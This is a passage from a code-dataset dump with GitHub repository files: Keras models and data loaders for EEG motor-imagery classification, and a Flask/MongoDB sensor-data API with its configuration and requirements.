"text": "import json\r\n\r\nwith open('people.json', 'r') as jsonfile:\r\n people = json.load(jsonfile)\r\n # print(people)\r\n\r\n\r\nclass Person(object):\r\n def __init__(self, name):\r\n self.name = name\r\n self.column = people[name][\"column\"]\r\n self.alias = people[name][\"alias\"]\r\n self.id = people[name]['id']\r\n\r\n def __str__(self):\r\n return f'[\\n name - {self.name}\\n alias - {self.alias}\\n id - {self.id}\\n column - {self.column}\\n]'\r\n\r\n\r\ndef get_people():\r\n people_list = []\r\n for name in people:\r\n people_list.append(Person(name))\r\n return people_list\r\n\r\n\r\ndef get_cards():\r\n cards = []\r\n with open('CommanderCubeRotisserie.txt', 'r') as readfile:\r\n for line in readfile:\r\n cards.append(line.strip())\r\n return cards\r\n\r\n\r\ndef main():\r\n for person in get_people():\r\n print(person)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"
}
] | 5 |
aldenperrine/ece_247
|
https://github.com/aldenperrine/ece_247
|
a57856337274bdfe8620fb39de6fb0957f00ad46
|
b99c113567ff00481d733c72a0535dcbc5881ade
|
9a3fa125132d725e524abc606f4f399a6b206e7b
|
refs/heads/master
| 2021-02-18T22:46:22.179593 | 2020-03-16T03:04:20 | 2020-03-16T03:04:20 | 245,247,335 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5482571125030518,
"alphanum_fraction": 0.5750554203987122,
"avg_line_length": 37.09449005126953,
"blob_id": "56c34d9b95ee4b3a052c2f124452832291af5338",
"content_id": "c542024a8338e8c3cd890af8fdc3c039be666867",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4963,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 127,
"path": "/load.py",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\n\r\ndef load_data():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n return (X_test, y_test, person_train_valid, X_train_valid, y_train_valid, person_test)\r\n\r\ndef load_data_subject_1_train_and_test():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n\r\n subject_1_count = 0\r\n for i in range(person_train_valid.shape[0]):\r\n if person_train_valid[i] == 0:\r\n subject_1_count += 1\r\n subject_1_valid = [0] * subject_1_count\r\n j = 0\r\n for i in range(person_train_valid.shape[0]):\r\n if person_train_valid[i] == 0:\r\n subject_1_valid[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in subject_1_valid]}')\r\n s1_x_valid = np.zeros((subject_1_count, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid:\r\n s1_x_valid[r,:,:] = X_train_valid[i,:,:]\r\n r += 1\r\n # print(f's1_x_valid shape is {s1_x_valid.shape}')\r\n s1_y_valid = np.zeros((subject_1_count))\r\n r = 0\r\n for p in subject_1_valid:\r\n s1_y_valid[r] = y_train_valid[p]\r\n r += 1\r\n # print(f's1_y_valid shape is {s1_y_valid.shape}')\r\n\r\n # print('')\r\n # print('test data below')\r\n\r\n subject_1_count_test = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_count_test += 1\r\n subject_1_valid_test = [0] * subject_1_count_test\r\n j = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_valid_test[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count_test} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in subject_1_valid_test]}')\r\n s1_x_test = np.zeros((subject_1_count_test, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid_test:\r\n s1_x_test[r,:,:] = X_test[i,:,:]\r\n r += 1\r\n # print(f's1_x_test shape is {s1_x_test.shape}')\r\n s1_y_test = np.zeros((subject_1_count_test))\r\n r = 0\r\n for p in subject_1_valid_test:\r\n s1_y_test[r] = y_test[p]\r\n r += 1\r\n # print(f's1_y_test shape is {s1_y_test.shape}')\r\n return (s1_x_test, s1_y_test, person_train_valid, s1_x_valid, s1_y_valid, person_test)\r\n\r\ndef load_data_subject_1_test_and_full_train():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n\r\n subject_1_count_test = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_count_test += 1\r\n subject_1_valid_test = [0] * subject_1_count_test\r\n j = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_valid_test[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count_test} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in 
subject_1_valid_test]}')\r\n s1_x_test = np.zeros((subject_1_count_test, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid_test:\r\n s1_x_test[r,:,:] = X_test[i,:,:]\r\n r += 1\r\n # print(f's1_x_test shape is {s1_x_test.shape}')\r\n s1_y_test = np.zeros((subject_1_count_test))\r\n r = 0\r\n for p in subject_1_valid_test:\r\n s1_y_test[r] = y_test[p]\r\n r += 1\r\n # print(f's1_y_test shape is {s1_y_test.shape}')\r\n return (s1_x_test, s1_y_test, person_train_valid, X_train_valid, y_train_valid, person_test)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sets = load_data()\r\n labels = [\"X_test\",\r\n \"y_test\",\r\n \"person_train_valid\",\r\n \"X_train_valid\",\r\n \"y_train_valid\",\r\n \"person_test\"]\r\n print('generating data using all test and all train')\r\n for i, k in enumerate(sets):\r\n print('{}: {} '.format(labels[i], k.shape))\r\n print('generating data using subj 1 test and subj 1 train')\r\n printy = load_data_subject_1_train_and_test()\r\n for i, k in enumerate(printy):\r\n print('{}: {} '.format(labels[i], k.shape))\r\n print('generating data using subj 1 test and full train')\r\n thingy = load_data_subject_1_test_and_full_train()\r\n for i, k in enumerate(thingy):\r\n print('{}: {} '.format(labels[i], k.shape))"
},
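The per-subject filtering in `load.py` above is done with explicit counting loops; NumPy boolean masking does the same selection directly. A sketch under the same assumed shapes (`person` is `(N, 1)` or `(N,)`, `X` is `(N, 22, 1000)`):

```python
import numpy as np

def select_subject(X, y, person, subject=0):
    # Boolean mask over trials that belong to the given subject
    mask = np.asarray(person).reshape(-1) == subject
    return X[mask], y[mask]  # shapes (n_subject, 22, 1000) and (n_subject,)
```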
{
"alpha_fraction": 0.5862817764282227,
"alphanum_fraction": 0.6196832060813904,
"avg_line_length": 33.187774658203125,
"blob_id": "0c44946251b8cb0be56343ed032effe0fbe42f23",
"content_id": "1336170ae9d0bb9c62640df67fe64af6a00f1ad4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15658,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 458,
"path": "/models.py",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "# Mixed precision for running on Nvidia GPU\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# keras is distinct from tf.keras\nfrom keras import layers as klayers\nfrom keras import models as kmodels\nfrom tensorflow.keras import backend as K\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers, regularizers\nfrom tensorflow.keras.mixed_precision import experimental as mixed_precision\n\nimport numpy as np\n\nimport load\nimport matplotlib.pyplot as plt\n\n\ndef init():\n gpus = tf.config.experimental.list_physical_devices('GPU')\n\n try:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(\n logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n print(e)\n\n\ndef plot(history):\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n\ndef make_fc_model(x_train, y_train, x_test, y_test):\n x_train = x_train.reshape(2115, -1)\n x_test = x_test.reshape(443, -1)\n y_train -= 769\n y_test -= 769\n\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_policy(policy)\n num_units = 4096\n inputs = keras.Input(shape=(22000, ), name='eeg_data')\n dense1 = layers.Dense(num_units, activation='relu', name='dense_1')\n x = dense1(inputs)\n dense2 = layers.Dense(num_units, activation='relu', name='dense_2')\n x = dense2(x)\n dense3 = layers.Dense(num_units, activation='relu', name='dense_3')\n x = dense3(x)\n\n # 'kernel' is dense1's variable\n x = layers.Dense(4, name='dense_logits')(x)\n outputs = layers.Activation(\n 'softmax', dtype='float32', name='predictions')(x)\n model = keras.Model(inputs=inputs, outputs=outputs)\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=10,\n validation_split=0.1)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n return model\n\n\ndef make_cnn_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n #policy = mixed_precision.Policy('mixed_float16')\n #mixed_precision.set_policy(policy)\n x_train = x_train.transpose((0, 2, 1))[:, :, :, None]\n x_test = x_test.transpose((0, 2, 1))[:, :, :, None]\n y_train -= 769\n y_test -= 769\n\n print(x_train.shape)\n\n model = keras.models.Sequential()\n size = int(25 * relative_size)\n conv1 = layers.Conv2D(size, kernel_size=(\n 10, 1), strides=1, kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(size, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.AveragePooling2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n conv3 = layers.Conv2D(2*size, kernel_size=(10, size),\n kernel_regularizer=regularizers.l2(reg))\n model.add(layers.ELU(alpha))\n perm2 = layers.Permute((1, 3, 2))\n pool2 = 
layers.AveragePooling2D(pool_size=(3, 1))\n drop2 = layers.Dropout(dropout)\n\n model.add(conv3)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm2)\n model.add(pool2)\n model.add(drop2)\n\n conv4 = layers.Conv2D(4*size, kernel_size=(10, 2*size),\n kernel_regularizer=regularizers.l2(reg))\n perm3 = layers.Permute((1, 3, 2))\n pool3 = layers.AveragePooling2D(pool_size=(3, 1))\n drop3 = layers.Dropout(dropout)\n\n model.add(conv4)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm3)\n model.add(pool3)\n model.add(drop3)\n\n conv5 = layers.Conv2D(8*size, kernel_size=(10, 4*size),\n kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.AveragePooling2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(4, name='dense_logits'))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2,\n verbose=1)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n plot(history)\n\n return model\n\n\ndef make_lstm_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n #policy = mixed_precision.Policy('mixed_float16')\n #mixed_precision.set_policy(policy)\n x_train = x_train.transpose((0, 2, 1))[:, :, :, None]\n x_test = x_test.transpose((0, 2, 1))[:, :, :, None]\n y_train -= 769\n y_test -= 769\n\n model = keras.models.Sequential()\n\n conv1 = layers.Conv2D(30, kernel_size=(10, 1), strides=1,\n kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(30, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.MaxPool2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n model.add(layers.Reshape((330, 30)))\n\n model.add(layers.LSTM(20, return_sequences=True,\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.BatchNormalization())\n drop1 = layers.Dropout(dropout)\n model.add(drop1)\n\n model.add(layers.LSTM(20, return_sequences=True,\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.BatchNormalization())\n drop1 = layers.Dropout(dropout)\n model.add(drop1)\n\n model.add(layers.Reshape((330, 20, 1)))\n conv5 = layers.Conv2D(60, kernel_size=(\n 10, 1), kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.MaxPool2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n 
model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n dense2 = layers.Dense(128, name='dense_2')\n model.add(layers.TimeDistributed(dense2))\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n drop2 = layers.Dropout(dropout)\n model.add(drop2)\n model.add(layers.Flatten())\n model.add(layers.Dense(4, name='dense_logits',\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n plot(history)\n\n return model\n\n\ndef nll(y_true, y_pred):\n \"\"\" Negative log likelihood (Bernoulli). \"\"\"\n\n # keras.losses.binary_crossentropy gives the mean\n # over the last axis. we require the sum\n return K.sum(keras.losses.mean_squared_error(y_true, y_pred))\n\nclass KLDivergenceLayer(klayers.Layer):\n\n \"\"\" Identity transform layer that adds KL divergence\n to the final model loss.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.is_placeholder = True\n super(KLDivergenceLayer, self).__init__(*args, **kwargs)\n\n def call(self, inputs):\n\n mu, log_var = inputs\n\n kl_batch = - .5 * K.sum(1 + log_var -\n K.square(mu) -\n K.exp(log_var), axis=-1)\n\n self.add_loss(K.mean(kl_batch), inputs=inputs)\n\n return inputs\n\n\ndef make_vae_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n y_train -= 769\n y_test -= 769\n\n # latent_dim should be much smaller, but right now its equal to the original cnn input size\n latent_dim = 500 * 22 # 2\n original_dim = 22000\n intermediate_dim = 512\n batch_size = 100\n \n epsilon_std = 1.0\n\n x_train = x_train.reshape(-1, original_dim)\n train_mean = np.mean(x_train)\n train_std = np.std(x_train)\n norm_x_train = (x_train -train_mean ) / train_std\n\n x_test = x_test.reshape(-1, original_dim)\n test_mean = np.mean(x_test)\n test_std = np.std(x_test)\n norm_x_test = (x_test - test_mean ) / test_std\n\n decoder = kmodels.Sequential([\n klayers.Dense(intermediate_dim, input_dim=latent_dim,\n activation='relu', kernel_regularizer=regularizers.l2(reg)),\n klayers.Dense(original_dim, activation='sigmoid', kernel_regularizer=regularizers.l2(reg))\n ])\n\n x = klayers.Input(shape=(original_dim,))\n h = klayers.Dense(intermediate_dim, activation='relu', kernel_regularizer=regularizers.l2(reg))(x)\n\n z_mu = klayers.Dense(latent_dim, kernel_regularizer=regularizers.l2(reg))(h)\n z_log_var = klayers.Dense(latent_dim, kernel_regularizer=regularizers.l2(reg))(h)\n\n z_mu, z_log_var = KLDivergenceLayer()([z_mu, z_log_var])\n z_sigma = klayers.Lambda(lambda t: K.exp(.5 * t))(z_log_var)\n\n eps = klayers.Input(tensor=K.random_normal(stddev=epsilon_std,\n shape=(K.shape(x)[0], latent_dim)))\n z_eps = klayers.Multiply()([z_sigma, eps])\n z = klayers.Add()([z_mu, z_eps])\n\n x_pred = decoder(z)\n vae = kmodels.Model(inputs=[x, eps], outputs=x_pred)\n vae.compile(optimizer='rmsprop', 
loss=nll)\n\n history = vae.fit(norm_x_train,\n norm_x_train,\n shuffle=True,\n epochs=epochs,\n batch_size=batch_size,\n validation_split=.2)\n\n encoder = kmodels.Model(x, z_mu)\n z_train = encoder.predict(norm_x_train, batch_size=batch_size)\n z_test = encoder.predict(norm_x_test, batch_size=batch_size)\n\n z_train = z_train.reshape(-1, 22, 500, 1).transpose(0, 2, 1, 3)\n z_test = z_test.reshape(-1, 22, 500, 1).transpose(0, 2, 1, 3)\n # now pass encoded input into cnn\n\n size = int(25 * relative_size)\n conv1 = layers.Conv2D(size, kernel_size=(\n 10, 1), strides=1, kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(size, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.AveragePooling2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model = keras.models.Sequential()\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n conv3 = layers.Conv2D(2*size, kernel_size=(10, size),\n kernel_regularizer=regularizers.l2(reg))\n model.add(layers.ELU(alpha))\n perm2 = layers.Permute((1, 3, 2))\n pool2 = layers.AveragePooling2D(pool_size=(3, 1))\n drop2 = layers.Dropout(dropout)\n\n model.add(conv3)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm2)\n model.add(pool2)\n model.add(drop2)\n\n conv4 = layers.Conv2D(4*size, kernel_size=(10, 2*size),\n kernel_regularizer=regularizers.l2(reg))\n perm3 = layers.Permute((1, 3, 2))\n pool3 = layers.AveragePooling2D(pool_size=(3, 1))\n drop3 = layers.Dropout(dropout)\n\n model.add(conv4)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm3)\n model.add(pool3)\n model.add(drop3)\n\n conv5 = layers.Conv2D(8*size, kernel_size=(10, 4*size),\n kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.AveragePooling2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(4, name='dense_logits'))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(z_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2,\n verbose=1)\n test_scores = model.evaluate(z_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n plot(history)\n\n return model\n\n\nif __name__ == \"__main__\":\n init()\n x_test, y_test, _, x_train, y_train, _ = load.load_data()\n #make_cnn_model(x_train, y_train, x_test, y_test, reg=0.005, dropout=0.6, learning_rate=0.00075, alpha=0.8, epochs=100)\n # make_lstm_model(x_train, y_train, x_test, y_test,\n # reg=0.002, dropout=0.45, alpha=.8)\n make_vae_model(x_train, y_train, x_test, y_test)\n"
},
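`KLDivergenceLayer` in `models.py` above adds the closed-form KL divergence between N(mu, sigma^2) and a standard normal to the model loss. A quick NumPy sanity check of that expression against the textbook formula (the values are arbitrary):

```python
import numpy as np

mu, log_var = np.array([0.5]), np.array([0.1])

# The layer's expression
kl = -0.5 * np.sum(1 + log_var - mu**2 - np.exp(log_var))

# Textbook form: KL(N(mu, s^2) || N(0, 1)) = 0.5 * (s^2 + mu^2 - 1 - ln s^2)
s2 = np.exp(log_var)
kl_ref = np.sum(0.5 * (s2 + mu**2 - 1 - log_var))

assert np.allclose(kl, kl_ref)
```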
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 24,
"blob_id": "d0ff9d07a5fccfb1d58e26e05f03287060440d52",
"content_id": "69282e7b4dbfd51b82c441469672bc9f899dbef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 3,
"path": "/README.md",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "# ece_247\n\nUse `pip3 install -r requirements.txt` to install dependencies.\n"
}
] | 3 |
rgarb16/smartalertcloud
|
https://github.com/rgarb16/smartalertcloud
|
86bd3eaf8352c9b294fff076a2393ee7411054bb
|
d0533d5cb2bc4c73d2c922e6bcdf534b7dd72387
|
c6fcc5dd3442d4894a78ffbbf5fae5035afe60be
|
refs/heads/master
| 2022-01-13T10:28:02.445974 | 2019-05-19T17:49:15 | 2019-05-19T17:49:15 | 182,945,620 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.46858638525009155,
"alphanum_fraction": 0.6910994648933411,
"avg_line_length": 14.916666984558105,
"blob_id": "2909a9d47106c9d57848839ceb347018aa0ed33b",
"content_id": "10ae1d5be1af331ba08bed3e582f5371a491a328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 24,
"path": "/iot_server_app/requirements.txt",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "aniso8601==6.0.0\nAST==0.0.2\nBabel==0.9.6\nboto3==1.9.134\nbotocore==1.12.134\ncloud-init==18.2\ndecorator==3.4.0\nFlask==1.0.2\nFlask-RESTful==0.3.7\nIPy==0.75\nJinja2==2.10.1\njsonpatch==1.2\njsonpointer==1.9\nlxml==3.2.1\nMagic-file-extensions==0.2\nMarkupSafe==1.1.1\nperf==0.1\nprettytable==0.7.2\npycurl==7.19.0\npymongo==3.7.2\npyxattr==0.5.1\ns3transfer==0.2.0\nurllib3==1.24.2\nWerkzeug==0.15.2\n"
},
{
"alpha_fraction": 0.5664263367652893,
"alphanum_fraction": 0.5822176337242126,
"avg_line_length": 24.552631378173828,
"blob_id": "d370ef138fb322cf51f5465f083a683ff2c0ccc7",
"content_id": "9094c15463444cbc610ec3913bc405c72575f333",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2913,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 114,
"path": "/iot_server_app/app/sensorData.py",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "\"\"\"This module will serve the api request.\"\"\"\n\nfrom config import client\nfrom app import app\nfrom bson.json_util import dumps\nfrom flask import request, jsonify\nimport json\nimport ast\nimport imp\nimport calendar\nimport datetime\nfrom bson.objectid import ObjectId\n\"\"\"\n 04/24/2019 \n - Added functionality to generate report\n\"\"\"\n\n# Import the helpers module\nhelper_module = imp.load_source('*', './app/helpers.py')\n\n# Select the database\ndb = client.sensordb\n# Select the collection\ncollection = db.sensor\n\[email protected](\"/\")\ndef get_initial_response():\n message = {\n 'apiVersion': 'v1.0',\n 'status': '200',\n 'message': 'Welcome to the Sensor Data API'\n }\n resp = jsonify(message)\n return resp\n\n\[email protected](\"/api/v1/sensor\", methods=['POST'])\ndef create_sensor():\n \"\"\"\n Function to Add sensor data \n \"\"\"\n try:\n # Add sensor \n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return \"\", 400\n\n record_created = collection.insert(body)\n\n if isinstance(record_created, list):\n return jsonify([str(v) for v in record_created]), 201\n else:\n return jsonify(str(record_created)), 201\n except:\n return \"\", 500\n\n\[email protected](\"/api/v1/sensor\", methods=['GET'])\ndef get_sensor_data():\n \"\"\"\n Function to get sensors data.\n \"\"\"\n try:\n query_params = helper_module.parse_query_params(request.query_string)\n # Check if dictionary is not empty\n if query_params:\n\n query = {k: int(v) if isinstance(v, str) and v.isdigit() else v for k, v in query_params.items()}\n\n records_fetched = collection.find(query)\n\n if records_fetched.count() > 0:\n return dumps(records_fetched)\n else:\n return \"\", 404\n\n # If dictionary is empty\n else:\n if collection.find().count > 0:\n return dumps(collection.find())\n else:\n return jsonify([])\n except:\n return \"\", 500\n\n#Generate reports\[email protected](\"/api/v1/sensor/report/<int:hours>\", methods=['GET'])\ndef get_report_data(hours):\n try:\n if collection.find().count > 0:\n gen_time = datetime.datetime.today() - datetime.timedelta(hours=hours) \n records = ObjectId.from_datetime(gen_time)\n result = list(db.coll.find({\"_id\": {\"$gte\": records}}))\n\n return dumps(collection.find({\"_id\": {\"$gte\": records}}))\n else:\n return jsonify([])\n except Exception as e:\n print e.message, e.args\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n"
},
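A minimal client for the three endpoints defined above, assuming the service is reachable at a hypothetical `http://localhost:5000` (substitute your deployment's host):

```python
import requests

base = "http://localhost:5000"  # hypothetical host

# Create a reading
r = requests.post(base + "/api/v1/sensor",
                  json={"sensor_id": 81, "sensor_type": "humidity"})
print(r.status_code)  # 201 on success

# Query by any stored field
print(requests.get(base + "/api/v1/sensor",
                   params={"sensor_type": "humidity"}).text)

# Report over the last 24 hours
print(requests.get(base + "/api/v1/sensor/report/24").text)
```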
{
"alpha_fraction": 0.6497326493263245,
"alphanum_fraction": 0.7433155179023743,
"avg_line_length": 40.55555725097656,
"blob_id": "7fd7fc3d13a78df6b84712cb4841a5ab49e11096",
"content_id": "1a822b61fdc3c8677d0b8676d9cabde9aad3533c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 9,
"path": "/iot_server_app/config.py",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "\"\"\"This module is to configure app to connect with database.\"\"\"\n\nfrom pymongo import MongoClient\nimport urllib\n\nDATABASE = MongoClient()['sensordb'] # DB_NAME\nDEBUG = True\nuri = \"mongodb://sensor_user1:\"+urllib.quote(\"xxx\")+\"@mongo1:27017,mongo2:27017/?replicaSet=myreplica01\"\nclient = MongoClient(['mongo1:27017', 'mongo2:27017', 'mongo3:27017'], replicaSet='myreplica01')\n"
},
{
"alpha_fraction": 0.5935935974121094,
"alphanum_fraction": 0.6796796917915344,
"avg_line_length": 46.380950927734375,
"blob_id": "a943e5d316c0c8d0e8021e08732908c798725e8b",
"content_id": "f0416de2b2cc7292647247ac691c8a5234994236",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 21,
"path": "/README.md",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
